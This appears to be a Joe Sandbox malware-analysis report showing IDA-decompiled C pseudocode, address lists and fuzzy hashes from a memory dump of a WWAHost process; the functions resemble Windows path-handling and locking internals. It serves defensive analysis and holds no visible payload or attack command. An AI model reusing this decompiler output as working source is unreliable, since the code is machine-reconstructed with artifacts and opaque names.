                                              													}
                                              													_t306 = 0;
                                              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                              													_t275 = _v572;
                                              													if(_t275 != 0) {
                                              														_t306 =  *_t275;
                                              														if(_t306 != 0) {
                                              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                              														}
                                              													}
                                              													_t181 = _v544;
                                              													if(_t181 != 0) {
                                              														 *_t181 = 0;
                                              														 *((intOrPtr*)(_t181 + 4)) = 0;
                                              														 *((intOrPtr*)(_t181 + 8)) = 0;
                                              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                              														if(_v540 == 5) {
                                              															_t182 = E039552A5(1);
                                              															_v588 = _t182;
                                              															if(_t182 == 0) {
                                              																E0396EB70(1, 0x3a479a0);
                                              																goto L38;
                                              															} else {
                                              																_v560 = _t182 + 0xc;
                                              																_t185 = E0396AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                              																if(_t185 == 0) {
                                              																	_t324 = _v588;
                                              																	goto L97;
                                              																} else {
                                              																	_t306 = _v544;
                                              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                              																	 *(_t306 + 4) = _t282;
                                              																	_v576 = _t282;
                                              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                              																	 *_t306 = _t325;
                                              																	if( *_t282 == 0x5c) {
                                              																		_t149 = _t325 - 2; // -2
                                              																		_t283 = _t149;
                                              																		 *_t306 = _t283;
                                              																		 *(_t306 + 4) = _v576 + 2;
                                              																		_t185 = _t283 & 0x0000ffff;
                                              																	}
                                              																	_t324 = _v588;
                                              																	 *(_t306 + 2) = _t185;
                                              																	if((_v548 & 0x00000002) == 0) {
                                              																		L97:
                                              																		asm("lock xadd [esi], eax");
                                              																		if((_t185 | 0xffffffff) == 0) {
                                              																			_push( *((intOrPtr*)(_t324 + 4)));
                                              																			E039995D0();
                                              																			L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                              																		}
                                              																	} else {
                                              																		 *(_t306 + 0xc) = _t324;
                                              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                              																	}
                                              																	goto L38;
                                              																}
                                              															}
                                              															goto L41;
                                              														}
                                              													}
                                              													L38:
                                              													_t322 = 0;
                                              												}
                                              											}
                                              										}
                                              									}
                                              									L39:
                                              									if(_t254 !=  &_v532) {
                                              										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                              									}
                                              									_t169 = _t322;
                                              								}
                                              								goto L41;
                                              							}
                                              							goto L68;
                                              						}
                                              					}
                                              					L41:
                                              					_pop(_t317);
                                              					_pop(_t323);
                                              					_pop(_t255);
                                              					return E0399B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                              				} else {
                                              					_t299 = __edx[2];
                                              					if( *_t299 == 0x5c) {
                                              						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                              						if(_t256 != 0x5c) {
                                              							if(_t256 != 0x3f) {
                                              								goto L2;
                                              							} else {
                                              								goto L50;
                                              							}
                                              						} else {
                                              							L50:
                                              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                              								goto L2;
                                              							} else {
                                              								_t251 = E03993D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                              								_pop(_t319);
                                              								_pop(_t326);
                                              								_pop(_t257);
                                              								return E0399B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                              							}
                                              						}
                                              					} else {
                                              						L2:
                                              						_t260 = _v572;
                                              						goto L3;
                                              					}
                                              				}
                                              				L101:
                                              			}

                                              0x03974292
                                              0x0397429e
                                              0x039742a3
                                              0x039742a7
                                              0x039742ac
                                              0x039be22d
                                              0x039742b2
                                              0x039742b2
                                              0x039742b9
                                              0x039742bc
                                              0x039742c2
                                              0x039742ca
                                              0x039742cd
                                              0x039742cd
                                              0x039742d4
                                              0x0397433f
                                              0x0397433f
                                              0x039742d6
                                              0x039742d6
                                              0x039742d9
                                              0x039742dd
                                              0x039742eb
                                              0x039be23a
                                              0x039742f1
                                              0x03974305
                                              0x0397430d
                                              0x03974315
                                              0x03974318
                                              0x0397431f
                                              0x03974322
                                              0x0397432e
                                              0x0397433b
                                              0x0397433b
                                              0x00000000
                                              0x0397432e
                                              0x039742eb
                                              0x0397434c
                                              0x0397434e
                                              0x03974352
                                              0x03974359
                                              0x0397435e
                                              0x03974361
                                              0x0397436e
                                              0x0397438a
                                              0x0397438e
                                              0x03974396
                                              0x0397439e
                                              0x039743a1
                                              0x039743ad
                                              0x039743bb
                                              0x039743bb
                                              0x039743ad
                                              0x0397436e
                                              0x039743bf
                                              0x039743c5
                                              0x03974463
                                              0x03974463
                                              0x039743ce
                                              0x039743d5
                                              0x039743d9
                                              0x039743df
                                              0x03974475
                                              0x03974479
                                              0x03974491
                                              0x03974491
                                              0x03974479
                                              0x039743e5
                                              0x039743eb
                                              0x039743f4
                                              0x039743f6
                                              0x039743f9
                                              0x039743fc
                                              0x039743ff
                                              0x039744e8
                                              0x039744ed
                                              0x039744f3
                                              0x039be247
                                              0x00000000
                                              0x039744f9
                                              0x03974504
                                              0x03974508
                                              0x0397450f
                                              0x039be269
                                              0x00000000
                                              0x03974515
                                              0x03974519
                                              0x03974531
                                              0x03974534
                                              0x03974537
                                              0x0397453e
                                              0x03974541
                                              0x0397454a
                                              0x039be255
                                              0x039be255
                                              0x039be25b
                                              0x039be25e
                                              0x039be261
                                              0x039be261
                                              0x03974555
                                              0x03974559
                                              0x0397455d
                                              0x039be26d
                                              0x039be270
                                              0x039be274
                                              0x039be27a
                                              0x039be27d
                                              0x039be28e
                                              0x039be28e
                                              0x03974563
                                              0x03974563
                                              0x03974569
                                              0x03974569
                                              0x00000000
                                              0x0397455d
                                              0x0397450f
                                              0x00000000
                                              0x039744f3
                                              0x039743ff
                                              0x03974405
                                              0x03974405
                                              0x03974405
                                              0x039742ac
                                              0x0397428c
                                              0x03974282
                                              0x03974407
                                              0x0397440d
                                              0x039be2af
                                              0x039be2af
                                              0x03974413
                                              0x03974413
                                              0x00000000
                                              0x039741d4
                                              0x00000000
                                              0x039741c3
                                              0x039741bd
                                              0x03974415
                                              0x03974415
                                              0x03974416
                                              0x03974417
                                              0x03974429
                                              0x0397416e
                                              0x0397416e
                                              0x03974175
                                              0x03974498
                                              0x0397449f
                                              0x039be12d
                                              0x00000000
                                              0x039be133
                                              0x00000000
                                              0x039be133
                                              0x039744a5
                                              0x039744a5
                                              0x039744aa
                                              0x00000000
                                              0x039744bb
                                              0x039744ca
                                              0x039744d6
                                              0x039744d7
                                              0x039744d8
                                              0x039744e3
                                              0x039744e3
                                              0x039744aa
                                              0x0397417b
                                              0x0397417b
                                              0x0397417b
                                              0x00000000
                                              0x0397417b
                                              0x03974175
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52beffd74f07e8fe9d1c502e8ca87d597f6cb0bb23f5927866f7b7e88b21d13a
                                              • Instruction ID: c19a13be8c2d17dc8bf12ac88e20ee4636379b30b8f7467392ab82e1695d3c30
                                              • Opcode Fuzzy Hash: 52beffd74f07e8fe9d1c502e8ca87d597f6cb0bb23f5927866f7b7e88b21d13a
                                              • Instruction Fuzzy Hash: 69F18C74A083118BC724CF1AC580A7AB7F9FF88754F59496EF886CB291E734D891CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E039820A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed char _v24;
                                              				intOrPtr _v28;
                                              				signed int _v32;
                                              				void* _v36;
                                              				char _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				unsigned int _v60;
                                              				char _v64;
                                              				unsigned int _v68;
                                              				signed int _v72;
                                              				char _v73;
                                              				signed int _v74;
                                              				char _v75;
                                              				signed int _v76;
                                              				void* _v81;
                                              				void* _v82;
                                              				void* _v89;
                                              				void* _v92;
                                              				void* _v97;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed char _t128;
                                              				void* _t129;
                                              				signed int _t130;
                                              				void* _t132;
                                              				signed char _t133;
                                              				intOrPtr _t135;
                                              				signed int _t137;
                                              				signed int _t140;
                                              				signed int* _t144;
                                              				signed int* _t145;
                                              				intOrPtr _t146;
                                              				signed int _t147;
                                              				signed char* _t148;
                                              				signed int _t149;
                                              				signed int _t153;
                                              				signed int _t169;
                                              				signed int _t174;
                                              				signed int _t180;
                                              				void* _t197;
                                              				void* _t198;
                                              				signed int _t201;
                                              				intOrPtr* _t202;
                                              				intOrPtr* _t205;
                                              				signed int _t210;
                                              				signed int _t215;
                                              				signed int _t218;
                                              				signed char _t221;
                                              				signed int _t226;
                                              				char _t227;
                                              				signed int _t228;
                                              				void* _t229;
                                              				unsigned int _t231;
                                              				void* _t235;
                                              				signed int _t240;
                                              				signed int _t241;
                                              				void* _t242;
                                              				signed int _t246;
                                              				signed int _t248;
                                              				signed int _t252;
                                              				signed int _t253;
                                              				void* _t254;
                                              				intOrPtr* _t256;
                                              				intOrPtr _t257;
                                              				unsigned int _t262;
                                              				signed int _t265;
                                              				void* _t267;
                                              				signed int _t275;
                                              
                                              				_t198 = __ebx;
                                              				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                              				_v68 = __ecx;
                                              				_v73 = 0;
                                              				_t201 = __edx & 0x00002000;
                                              				_t128 = __edx & 0xffffdfff;
                                              				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                              				_v72 = _t128;
                                              				if((_t128 & 0x00000008) != 0) {
                                              					__eflags = _t128 - 8;
                                              					if(_t128 != 8) {
                                              						L69:
                                              						_t129 = 0xc000000d;
                                              						goto L23;
                                              					} else {
                                              						_t130 = 0;
                                              						_v72 = 0;
                                              						_v75 = 1;
                                              						L2:
                                              						_v74 = 1;
                                              						_t226 =  *0x3a48714; // 0x0
                                              						if(_t226 != 0) {
                                              							__eflags = _t201;
                                              							if(_t201 != 0) {
                                              								L62:
                                              								_v74 = 1;
                                              								L63:
                                              								_t130 = _t226 & 0xffffdfff;
                                              								_v72 = _t130;
                                              								goto L3;
                                              							}
                                              							_v74 = _t201;
                                              							__eflags = _t226 & 0x00002000;
                                              							if((_t226 & 0x00002000) == 0) {
                                              								goto L63;
                                              							}
                                              							goto L62;
                                              						}
                                              						L3:
                                              						_t227 = _v75;
                                              						L4:
                                              						_t240 = 0;
                                              						_v56 = 0;
                                              						_t252 = _t130 & 0x00000100;
                                              						if(_t252 != 0 || _t227 != 0) {
                                              							_t240 = _v68;
                                              							_t132 = E03982EB0(_t240);
                                              							__eflags = _t132 - 2;
                                              							if(_t132 != 2) {
                                              								__eflags = _t132 - 1;
                                              								if(_t132 == 1) {
                                              									goto L25;
                                              								}
                                              								__eflags = _t132 - 6;
                                              								if(_t132 == 6) {
                                              									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                              									if( *((short*)(_t240 + 4)) != 0x3f) {
                                              										goto L40;
                                              									}
                                              									_t197 = E03982EB0(_t240 + 8);
                                              									__eflags = _t197 - 2;
                                              									if(_t197 == 2) {
                                              										goto L25;
                                              									}
                                              								}
                                              								L40:
                                              								_t133 = 1;
                                              								L26:
                                              								_t228 = _v75;
                                              								_v56 = _t240;
                                              								__eflags = _t133;
                                              								if(_t133 != 0) {
                                              									__eflags = _t228;
                                              									if(_t228 == 0) {
                                              										L43:
                                              										__eflags = _v72;
                                              										if(_v72 == 0) {
                                              											goto L8;
                                              										}
                                              										goto L69;
                                              									}
                                              									_t133 = E039558EC(_t240);
                                              									_t221 =  *0x3a45cac; // 0x16
                                              									__eflags = _t221 & 0x00000040;
                                              									if((_t221 & 0x00000040) != 0) {
                                              										_t228 = 0;
                                              										__eflags = _t252;
                                              										if(_t252 != 0) {
                                              											goto L43;
                                              										}
                                              										_t133 = _v72;
                                              										goto L7;
                                              									}
                                              									goto L43;
                                              								} else {
                                              									_t133 = _v72;
                                              									goto L6;
                                              								}
                                              							}
                                              							L25:
                                              							_t133 = _v73;
                                              							goto L26;
                                              						} else {
                                              							L6:
                                              							_t221 =  *0x3a45cac; // 0x16
                                              							L7:
                                              							if(_t133 != 0) {
                                              								__eflags = _t133 & 0x00001000;
                                              								if((_t133 & 0x00001000) != 0) {
                                              									_t133 = _t133 | 0x00000a00;
                                              									__eflags = _t221 & 0x00000004;
                                              									if((_t221 & 0x00000004) != 0) {
                                              										_t133 = _t133 | 0x00000400;
                                              									}
                                              								}
                                              								__eflags = _t228;
                                              								if(_t228 != 0) {
                                              									_t133 = _t133 | 0x00000100;
                                              								}
                                              								_t229 = E03994A2C(0x3a46e40, 0x3994b30, _t133, _t240);
                                              								__eflags = _t229;
                                              								if(_t229 == 0) {
                                              									_t202 = _a20;
                                              									goto L100;
                                              								} else {
                                              									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                              									L15:
                                              									_t202 = _a20;
                                              									 *_t202 = _t135;
                                              									if(_t229 == 0) {
                                              										L100:
                                              										 *_a4 = 0;
                                              										_t137 = _a8;
                                              										__eflags = _t137;
                                              										if(_t137 != 0) {
                                              											 *_t137 = 0;
                                              										}
                                              										 *_t202 = 0;
                                              										_t129 = 0xc0000017;
                                              										goto L23;
                                              									} else {
                                              										_t242 = _a16;
                                              										if(_t242 != 0) {
                                              											_t254 = _t229;
                                              											memcpy(_t242, _t254, 0xd << 2);
                                              											_t267 = _t267 + 0xc;
                                              											_t242 = _t254 + 0x1a;
                                              										}
                                              										_t205 = _a4;
                                              										_t25 = _t229 + 0x48; // 0x48
                                              										 *_t205 = _t25;
                                              										_t140 = _a8;
                                              										if(_t140 != 0) {
                                              											__eflags =  *((char*)(_t267 + 0xa));
                                              											if( *((char*)(_t267 + 0xa)) != 0) {
                                              												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                              											} else {
                                              												 *_t140 = 0;
                                              											}
                                              										}
                                              										_t256 = _a12;
                                              										if(_t256 != 0) {
                                              											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                              										}
                                              										_t257 =  *_t205;
                                              										_v48 = 0;
                                              										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                              										_v56 = 0;
                                              										_v52 = 0;
                                              										_t144 =  *( *[fs:0x30] + 0x50);
                                              										if(_t144 != 0) {
                                              											__eflags =  *_t144;
                                              											if( *_t144 == 0) {
                                              												goto L20;
                                              											}
                                              											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                              											goto L21;
                                              										} else {
                                              											L20:
                                              											_t145 = 0x7ffe0384;
                                              											L21:
                                              											if( *_t145 != 0) {
                                              												_t146 =  *[fs:0x30];
                                              												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                              												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                              													_t147 = E03977D50();
                                              													__eflags = _t147;
                                              													if(_t147 == 0) {
                                              														_t148 = 0x7ffe0385;
                                              													} else {
                                              														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                              													}
                                              													__eflags =  *_t148 & 0x00000020;
                                              													if(( *_t148 & 0x00000020) != 0) {
                                              														_t149 = _v72;
                                              														__eflags = _t149;
                                              														if(__eflags == 0) {
                                              															_t149 = 0x3935c80;
                                              														}
                                              														_push(_t149);
                                              														_push( &_v48);
                                              														 *((char*)(_t267 + 0xb)) = E0398F6E0(_t198, _t242, _t257, __eflags);
                                              														_push(_t257);
                                              														_push( &_v64);
                                              														_t153 = E0398F6E0(_t198, _t242, _t257, __eflags);
                                              														__eflags =  *((char*)(_t267 + 0xb));
                                              														if( *((char*)(_t267 + 0xb)) != 0) {
                                              															__eflags = _t153;
                                              															if(_t153 != 0) {
                                              																__eflags = 0;
                                              																E039D7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                              																L03972400(_t267 + 0x20);
                                              															}
                                              															L03972400( &_v64);
                                              														}
                                              													}
                                              												}
                                              											}
                                              											_t129 = 0;
                                              											L23:
                                              											return _t129;
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L8:
                                              							_t275 = _t240;
                                              							if(_t275 != 0) {
                                              								_v73 = 0;
                                              								_t253 = 0;
                                              								__eflags = 0;
                                              								L29:
                                              								_push(0);
                                              								_t241 = E03982397(_t240);
                                              								__eflags = _t241;
                                              								if(_t241 == 0) {
                                              									_t229 = 0;
                                              									L14:
                                              									_t135 = 0;
                                              									goto L15;
                                              								}
                                              								__eflags =  *((char*)(_t267 + 0xb));
                                              								 *(_t241 + 0x34) = 1;
                                              								if( *((char*)(_t267 + 0xb)) != 0) {
                                              									E03972280(_t134, 0x3a48608);
                                              									__eflags =  *0x3a46e48 - _t253; // 0xb5cef0
                                              									if(__eflags != 0) {
                                              										L48:
                                              										_t253 = 0;
                                              										__eflags = 0;
                                              										L49:
                                              										E0396FFB0(_t198, _t241, 0x3a48608);
                                              										__eflags = _t253;
                                              										if(_t253 != 0) {
                                              											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                              										}
                                              										goto L31;
                                              									}
                                              									 *0x3a46e48 = _t241;
                                              									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                              									__eflags = _t253;
                                              									if(_t253 != 0) {
                                              										_t57 = _t253 + 0x34;
                                              										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                              										__eflags =  *_t57;
                                              										if( *_t57 == 0) {
                                              											goto L49;
                                              										}
                                              									}
                                              									goto L48;
                                              								}
                                              								L31:
                                              								_t229 = _t241;
                                              								goto L14;
                                              							}
                                              							_v73 = 1;
                                              							_v64 = _t240;
                                              							asm("lock bts dword [esi], 0x0");
                                              							if(_t275 < 0) {
                                              								_t231 =  *0x3a48608; // 0x0
                                              								while(1) {
                                              									_v60 = _t231;
                                              									__eflags = _t231 & 0x00000001;
                                              									if((_t231 & 0x00000001) != 0) {
                                              										goto L76;
                                              									}
                                              									_t73 = _t231 + 1; // 0x1
                                              									_t210 = _t73;
                                              									asm("lock cmpxchg [edi], ecx");
                                              									__eflags = _t231 - _t231;
                                              									if(_t231 != _t231) {
                                              										L92:
                                              										_t133 = E03986B90(_t210,  &_v64);
                                              										_t262 =  *0x3a48608; // 0x0
                                              										L93:
                                              										_t231 = _t262;
                                              										continue;
                                              									}
                                              									_t240 = _v56;
                                              									goto L10;
                                              									L76:
                                              									_t169 = E0398E180(_t133);
                                              									__eflags = _t169;
                                              									if(_t169 != 0) {
                                              										_push(0xc000004b);
                                              										_push(0xffffffff);
                                              										E039997C0();
                                              										_t231 = _v68;
                                              									}
                                              									_v72 = 0;
                                              									_v24 =  *( *[fs:0x18] + 0x24);
                                              									_v16 = 3;
                                              									_v28 = 0;
                                              									__eflags = _t231 & 0x00000002;
                                              									if((_t231 & 0x00000002) == 0) {
                                              										_v32 =  &_v36;
                                              										_t174 = _t231 >> 4;
                                              										__eflags = 1 - _t174;
                                              										_v20 = _t174;
                                              										asm("sbb ecx, ecx");
                                              										_t210 = 3 |  &_v36;
                                              										__eflags = _t174;
                                              										if(_t174 == 0) {
                                              											_v20 = 0xfffffffe;
                                              										}
                                              									} else {
                                              										_v32 = 0;
                                              										_v20 = 0xffffffff;
                                              										_v36 = _t231 & 0xfffffff0;
                                              										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                              										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                              									}
                                              									asm("lock cmpxchg [edi], esi");
                                              									_t262 = _t231;
                                              									__eflags = _t262 - _t231;
                                              									if(_t262 != _t231) {
                                              										goto L92;
                                              									} else {
                                              										__eflags = _v72;
                                              										if(_v72 != 0) {
                                              											E0399006A(0x3a48608, _t210);
                                              										}
                                              										__eflags =  *0x7ffe036a - 1;
                                              										if(__eflags <= 0) {
                                              											L89:
                                              											_t133 =  &_v16;
                                              											asm("lock btr dword [eax], 0x1");
                                              											if(__eflags >= 0) {
                                              												goto L93;
                                              											} else {
                                              												goto L90;
                                              											}
                                              											do {
                                              												L90:
                                              												_push(0);
                                              												_push(0x3a48608);
                                              												E0399B180();
                                              												_t133 = _v24;
                                              												__eflags = _t133 & 0x00000004;
                                              											} while ((_t133 & 0x00000004) == 0);
                                              											goto L93;
                                              										} else {
                                              											_t218 =  *0x3a46904; // 0x400
                                              											__eflags = _t218;
                                              											if(__eflags == 0) {
                                              												goto L89;
                                              											} else {
                                              												goto L87;
                                              											}
                                              											while(1) {
                                              												L87:
                                              												__eflags = _v16 & 0x00000002;
                                              												if(__eflags == 0) {
                                              													goto L89;
                                              												}
                                              												asm("pause");
                                              												_t218 = _t218 - 1;
                                              												__eflags = _t218;
                                              												if(__eflags != 0) {
                                              													continue;
                                              												}
                                              												goto L89;
                                              											}
                                              											goto L89;
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L10:
                                              							_t229 =  *0x3a46e48; // 0xb5cef0
                                              							_v72 = _t229;
                                              							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                              								E0396FFB0(_t198, _t240, 0x3a48608);
                                              								_t253 = _v76;
                                              								goto L29;
                                              							} else {
                                              								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                              								asm("lock cmpxchg [esi], ecx");
                                              								_t215 = 1;
                                              								if(1 != 1) {
                                              									while(1) {
                                              										_t246 = _t215 & 0x00000006;
                                              										_t180 = _t215;
                                              										__eflags = _t246 - 2;
                                              										_v56 = _t246;
                                              										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                              										asm("lock cmpxchg [edi], esi");
                                              										_t248 = _v56;
                                              										__eflags = _t180 - _t215;
                                              										if(_t180 == _t215) {
                                              											break;
                                              										}
                                              										_t215 = _t180;
                                              									}
                                              									__eflags = _t248 - 2;
                                              									if(_t248 == 2) {
                                              										__eflags = 0;
                                              										E039900C2(0x3a48608, 0, _t235);
                                              									}
                                              									_t229 = _v72;
                                              								}
                                              								goto L14;
                                              							}
                                              						}
                                              					}
                                              				}
                                              				_t227 = 0;
                                              				_v75 = 0;
                                              				if(_t128 != 0) {
                                              					goto L4;
                                              				}
                                              				goto L2;
                                              			}
                                              0x039c5877
                                              0x039c5997
                                              0x039c599c
                                              0x039c59a1
                                              0x039c59a7
                                              0x039c59a7
                                              0x00000000
                                              0x039c59a7
                                              0x039c587d
                                              0x00000000
                                              0x039c588b
                                              0x039c588b
                                              0x039c5890
                                              0x039c5892
                                              0x039c5894
                                              0x039c5899
                                              0x039c589b
                                              0x039c58a0
                                              0x039c58a0
                                              0x039c58aa
                                              0x039c58b2
                                              0x039c58b6
                                              0x039c58be
                                              0x039c58c6
                                              0x039c58c9
                                              0x039c590d
                                              0x039c5917
                                              0x039c591a
                                              0x039c591c
                                              0x039c5920
                                              0x039c5928
                                              0x039c592a
                                              0x039c592c
                                              0x039c592e
                                              0x039c592e
                                              0x039c58cb
                                              0x039c58cd
                                              0x039c58d8
                                              0x039c58e0
                                              0x039c58f4
                                              0x039c58fe
                                              0x039c58fe
                                              0x039c593a
                                              0x039c593e
                                              0x039c5940
                                              0x039c5942
                                              0x00000000
                                              0x039c5944
                                              0x039c5944
                                              0x039c5949
                                              0x039c594e
                                              0x039c594e
                                              0x039c5953
                                              0x039c595b
                                              0x039c5976
                                              0x039c5976
                                              0x039c597a
                                              0x039c597f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5981
                                              0x039c5981
                                              0x039c5981
                                              0x039c5983
                                              0x039c5988
                                              0x039c598d
                                              0x039c5991
                                              0x039c5991
                                              0x00000000
                                              0x039c595d
                                              0x039c595d
                                              0x039c5963
                                              0x039c5965
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5967
                                              0x039c5967
                                              0x039c596b
                                              0x039c596d
                                              0x00000000
                                              0x00000000
                                              0x039c596f
                                              0x039c5971
                                              0x039c5971
                                              0x039c5974
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c5974
                                              0x00000000
                                              0x039c5967
                                              0x039c595b
                                              0x039c5942
                                              0x039c5863
                                              0x03982143
                                              0x03982143
                                              0x03982149
                                              0x0398214f
                                              0x039822f1
                                              0x039822f6
                                              0x00000000
                                              0x03982173
                                              0x03982173
                                              0x0398217d
                                              0x03982181
                                              0x03982186
                                              0x039c59ae
                                              0x039c59b2
                                              0x039c59b5
                                              0x039c59b7
                                              0x039c59ba
                                              0x039c59cd
                                              0x039c59d1
                                              0x039c59d5
                                              0x039c59d9
                                              0x039c59db
                                              0x00000000
                                              0x00000000
                                              0x039c59dd
                                              0x039c59dd
                                              0x039c59e1
                                              0x039c59e4
                                              0x039c59e7
                                              0x039c59ee
                                              0x039c59ee
                                              0x039c59f3
                                              0x039c59f3
                                              0x00000000
                                              0x03982186
                                              0x0398214f
                                              0x03982106
                                              0x03982266
                                              0x039820d8
                                              0x039820da
                                              0x039820e0
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1ca3b8ea9ef3073da5628e146a5171b2fb29262460cc97d40679295f02e2042
                                              • Instruction ID: ee649aeb59691c05b7db26bb52f545e8be30af2d61e6712d8eee8fa6dbedb1d5
                                              • Opcode Fuzzy Hash: f1ca3b8ea9ef3073da5628e146a5171b2fb29262460cc97d40679295f02e2042
                                              • Instruction Fuzzy Hash: 8FF125356083459FD725EF29C44072BB7E9AFC63A4F198D5DE8D98B280D735E841CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E0396D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                              				signed int _v8;
                                              				intOrPtr _v20;
                                              				signed int _v36;
                                              				intOrPtr* _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed char _v52;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				intOrPtr _v80;
                                              				signed int _v84;
                                              				intOrPtr _v100;
                                              				intOrPtr _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				intOrPtr _v120;
                                              				signed int _v132;
                                              				char _v140;
                                              				char _v144;
                                              				char _v157;
                                              				signed int _v164;
                                              				signed int _v168;
                                              				signed int _v169;
                                              				intOrPtr _v176;
                                              				signed int _v180;
                                              				signed int _v184;
                                              				intOrPtr _v188;
                                              				signed int _v192;
                                              				signed int _v200;
                                              				signed int _v208;
                                              				intOrPtr* _v212;
                                              				char _v216;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t204;
                                              				signed int _t206;
                                              				void* _t208;
                                              				signed int _t211;
                                              				signed int _t216;
                                              				intOrPtr _t217;
                                              				intOrPtr* _t218;
                                              				signed int _t226;
                                              				signed int _t239;
                                              				signed int* _t247;
                                              				signed int _t249;
                                              				void* _t252;
                                              				signed int _t256;
                                              				signed int _t269;
                                              				signed int _t271;
                                              				signed int _t277;
                                              				signed int _t279;
                                              				intOrPtr _t283;
                                              				signed int _t287;
                                              				signed int _t288;
                                              				void* _t289;
                                              				signed char _t290;
                                              				signed int _t292;
                                              				signed int* _t293;
                                              				unsigned int _t297;
                                              				signed int _t306;
                                              				signed int _t307;
                                              				signed int _t308;
                                              				signed int _t309;
                                              				signed int _t310;
                                              				intOrPtr _t311;
                                              				intOrPtr _t312;
                                              				signed int _t319;
                                              				signed int _t320;
                                              				signed int* _t324;
                                              				signed int _t337;
                                              				signed int _t338;
                                              				signed int _t339;
                                              				signed int* _t340;
                                              				void* _t341;
                                              				signed int _t344;
                                              				signed int _t348;
                                              				signed int _t349;
                                              				signed int _t351;
                                              				intOrPtr _t353;
                                              				void* _t354;
                                              				signed int _t356;
                                              				signed int _t358;
                                              				intOrPtr _t359;
                                              				signed int _t361;
                                              				signed int _t363;
                                              				signed short* _t365;
                                              				void* _t367;
                                              				intOrPtr _t369;
                                              				void* _t370;
                                              				signed int _t371;
                                              				signed int _t372;
                                              				void* _t374;
                                              				signed int _t376;
                                              				void* _t384;
                                              				signed int _t387;
                                              
                                              				_v8 =  *0x3a4d360 ^ _t376;
                                              				_t2 =  &_a20;
                                              				 *_t2 = _a20 & 0x00000001;
                                              				_t287 = _a4;
